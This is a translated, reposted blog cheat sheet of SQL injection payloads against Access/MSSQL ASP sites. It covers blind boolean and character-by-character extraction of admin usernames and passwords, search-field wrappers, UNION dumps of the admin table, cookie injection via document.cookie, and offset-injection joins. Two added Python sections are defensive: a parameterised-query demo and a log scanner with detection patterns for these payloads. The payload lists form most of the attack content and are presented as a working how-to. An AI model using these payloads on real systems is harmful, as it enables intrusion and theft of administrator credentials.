Injection statements explained: GET injection, search-type injection, cookie injection, and more
Source: Internet  Editor: 程序博客网  Time: 2024/05/17 06:59
Note: for an ordinary GET injection, if the parameter is string-typed, prepend ' and append and ''='
Halving (binary search) method
######################################
and exists (select * from MSysAccessObjects)
This checks whether the backend is an Access database: MSysAccessObjects is one of Access's default system tables.
and exists (select * from admin)
and exists(select id from admin)
and exists(select id from admin where id=1)
and exists(select id from admin where id>1)
Then test id>1; if the page still returns normally, there is more than one ID. Then try id<50 to narrow down the range.
and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97
If the page returns normally, the first character of the first username has ASCII code 97, i.e. 'a'.
To guess the second character, change username,1,1 to username,2,1.
To guess the password, change username to password.
##################################################
Search-type injection
##################################
%' and 1=1 and '%'='
%' and exists (select * from admin) and '%'='
%' and exists(select id from admin where id=1) and '%'='
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
To be clear, search-type injection is nothing special: prepend %' and append and '%'='
For an MSSQL backend, the trailing and '%'=' can be replaced with --
Search-type injection can also use union statements.
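The note above and the GET and halving sections all rely on the same defect: the request value is concatenated into the SQL text, so the ' / and ''=' and %' / and '%'=' wrappers simply close the original string literal and continue the query. The following is an added example, not code from the original post: it runs the page's own boolean and search-wrapper values against a vulnerable concatenated query and against a parameterised one, on an in-memory SQLite database (standing in for Access/MSSQL). The tables, rows and function names are constructed for the demo.

```python
# Added example (not from the original post): the same request values the
# page uses, run against a vulnerable string-concatenated query and against a
# parameterised one, on an in-memory SQLite database. Table names, columns
# and rows are constructed for the demo; SQLite stands in for Access/MSSQL.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer primary key, title text)")
    conn.execute("create table admin (id integer primary key, username text, password text)")
    conn.executemany("insert into news (id, title) values (?, ?)",
                     [(127, "Site launch"), (128, "Maintenance notice")])
    conn.execute("insert into admin values (1, 'admin', 'constructed')")
    conn.commit()
    return conn


def news_title_concat(conn, id_param):
    """VULNERABLE: the request parameter is pasted into the SQL text, the way a
    shownews.asp?id=127 page would; any SQL carried in the parameter executes."""
    sql = "select title from news where id=" + id_param + " order by id"
    return [row[0] for row in conn.execute(sql)]


def news_title_param(conn, id_param):
    """HARDENED: reject non-numeric input, then bind the value, so the driver
    never interprets it as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    rows = conn.execute("select title from news where id=? order by id", (int(id_param),))
    return [row[0] for row in rows]


def param_rejects(conn, id_param):
    """True if the hardened lookup refuses the value."""
    try:
        news_title_param(conn, id_param)
    except ValueError:
        return True
    return False


def search_concat(conn, keyword):
    """VULNERABLE search: the keyword is wrapped in '%...%' by concatenation,
    which is exactly the shape the %' ... and '%'=' wrapper targets."""
    sql = "select title from news where title like '%" + keyword + "%' order by id"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, keyword):
    """HARDENED search: bind the pattern and escape LIKE wildcards so that a
    user-supplied % or _ is matched literally."""
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    rows = conn.execute(
        "select title from news where title like ? escape '\\' order by id",
        ("%" + escaped + "%",))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for value in ["127", "127 and 1=2", "127 and exists (select * from admin)"]:
        print(repr(value), "concat ->", news_title_concat(db, value),
              "| param rejects:", param_rejects(db, value))
    for kw in ["launch", "%' and 1=1 and '%'='"]:
        print(repr(kw), "concat ->", search_concat(db, kw),
              "| param ->", search_param(db, kw))
```

With concatenation, `127 and 1=2` empties the result and `127 and exists (select * from admin)` keeps it, which is the true/false oracle the halving method reads; the search wrapper turns the LIKE filter into a tautology and returns every row. With binding, the numeric endpoint refuses anything that is not an integer and the search endpoint matches the wrapper text literally and finds nothing.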
########################################################
Union query
#####################################
order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1
Simple enough. One thing to note: where id=1 dumps the admin with ID 1, and where id=2 dumps the admin with ID 2. Usually the where id=1 restriction is omitted, in which case you should get the first admin row. (Note that an admin's id is not necessarily small; it could well be 100!)
###################################
Cookie injection
###############################
http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(document.cookie="id="+escape("127"));
alert(document.cookie="id="+escape("127 and 1=1"));
alert(document.cookie="id="+escape("127 order by 10"));
alert(document.cookie="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(document.cookie="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
These should need no explanation; the statements speak for themselves. A union query is used here again; swapping in the halving method works just as well, though it is not suited to normal people, since someone once worked themselves to death doing it that way.
###################################
Offset injection
###########################################################
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
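Every payload on this page, whether it arrives in the GET query string, the search field or (in the cookie-injection variant) a cookie set through document.cookie, reaches the server as a URL-encoded request value. The following is an added example, not code from the original post: it scans request-log lines for the payload shapes listed above, checking both the query string and the Cookie header, so that the cookie channel is not missed. The log format, the LOG_RE / PATTERNS names and all log lines are constructed for the demo.

```python
# Added example (not from the original post): scan request-log lines for the
# payload shapes listed on this page, in both the query string and the Cookie
# header, because the cookie-injection variant moves the same payload into
# document.cookie. The log format and all log lines are constructed for the
# demo; adapt LOG_RE to a real access-log format.
import re
from urllib.parse import unquote

# Matched against the decoded, lower-cased, whitespace-collapsed value.
PATTERNS = {
    "boolean_exists": re.compile(r"\band\s+exists\s*\(\s*select\b"),
    "boolean_tautology": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "union_select": re.compile(r"\bunion\s+select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "char_bruteforce": re.compile(r"\basc\s*\(\s*mid\s*\("),
    "search_wrapper": re.compile(r"%'\s+and\b"),
}

# Constructed log format: <ip> "<method> <path>" <status> cookie="<cookie header>"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) cookie="(?P<cookie>[^"]*)"$')


def normalise(value):
    """Undo one layer of %-encoding (what escape() / the browser apply), treat
    '+' as space, collapse whitespace and lower-case."""
    return re.sub(r"\s+", " ", unquote(value).replace("+", " ")).lower()


def extract_values(path, cookie):
    """Return (location, raw value) for every query parameter and cookie."""
    values = []
    if "?" in path:
        for pair in path.split("?", 1)[1].split("&"):
            key, _, val = pair.partition("=")
            values.append(("query:" + key, val))
    for part in cookie.split(";"):
        key, sep, val = part.strip().partition("=")
        if sep:
            values.append(("cookie:" + key, val))
    return values


def scan_line(line):
    """Return {'ip', 'path', 'hits'} for a parsable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for where, raw in extract_values(m["path"], m["cookie"]):
        decoded = normalise(raw)
        hits += [(where, name) for name, pat in PATTERNS.items() if pat.search(decoded)]
    return {"ip": m["ip"], "path": m["path"].split("?", 1)[0], "hits": hits}


def scan(lines):
    """Only the lines that triggered at least one pattern."""
    return [r for r in map(scan_line, lines) if r and r["hits"]]


# Constructed sample traffic: a benign request, three query-string probes from
# this page, the same union payload carried in a cookie, and a benign search.
SAMPLE_LOG = [
    '203.0.113.5 "GET /shownews.asp?id=127" 200 cookie=""',
    '203.0.113.5 "GET /shownews.asp?id=127%20and%20exists%20(select%20*%20from%20admin)" 200 cookie=""',
    '203.0.113.5 "GET /shownews.asp?id=127%20order%20by%2010" 500 cookie=""',
    '203.0.113.5 "GET /shownews.asp" 200 cookie="ASPSESSIONID=abc123; id=127%20and%201%3D2%20union%20select%201%2Cusername%2Cpassword%2C4%20from%20admin"',
    '198.51.100.7 "GET /search.asp?keyword=%25%27%20and%201%3D1%20and%20%27%25%27%3D%27" 200 cookie=""',
    '198.51.100.7 "GET /search.asp?keyword=news" 200 cookie=""',
]

if __name__ == "__main__":
    for result in scan(SAMPLE_LOG):
        print(result["ip"], result["path"], result["hits"])
```

The fourth sample line is the point of the cookie section: the request URL is clean (/shownews.asp with no query string), and only decoding the Cookie header reveals the union payload, so a detector that looks at URLs alone misses it. The order-by probe returning a 500 is also worth alerting on by itself, since column-count probing produces a burst of errors before the first successful union.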
Reposted from: http://tiwson.iteye.com/blog/1919349